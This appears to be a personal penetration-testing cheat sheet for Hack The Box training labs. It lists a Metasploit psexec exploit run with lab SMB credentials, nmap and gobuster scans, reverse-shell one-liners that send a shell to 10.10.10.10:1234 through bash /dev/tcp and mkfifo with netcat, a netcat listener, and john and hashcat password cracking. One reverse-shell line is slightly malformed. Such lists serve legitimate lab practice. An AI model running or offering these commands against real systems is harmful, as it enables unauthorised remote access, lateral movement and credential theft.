BasicCommands

msfconsole
search exploit/windows/smb/psexec
use 0
set Rhosts 10.10.10.10
set LHOST 10.10.10.10
set LHOST 10.10.10.10
set SMBUser htb-student
set SMBPass HTB_@cademy_stdnt!
exploit

nmap -sCV 10.10.10.10

python3 -m http.server 8000

gobuster dir -u http://link.link -w /usr/share/seclists/Discovery/Web-Content/common.txt -o dev_linkvortex_htb_gobuster

gobuster vhost -u http://link.link -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --append-domain -r -o linkvortex_subdomain_gobuster

bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

nc -lvnp 1234

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash i 2>&1|nc -lvp 1234 >/tmp/f

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

hashcat -m 0 -a 0 hash.txt rockyou.txt

nc 10.10.10.10 1234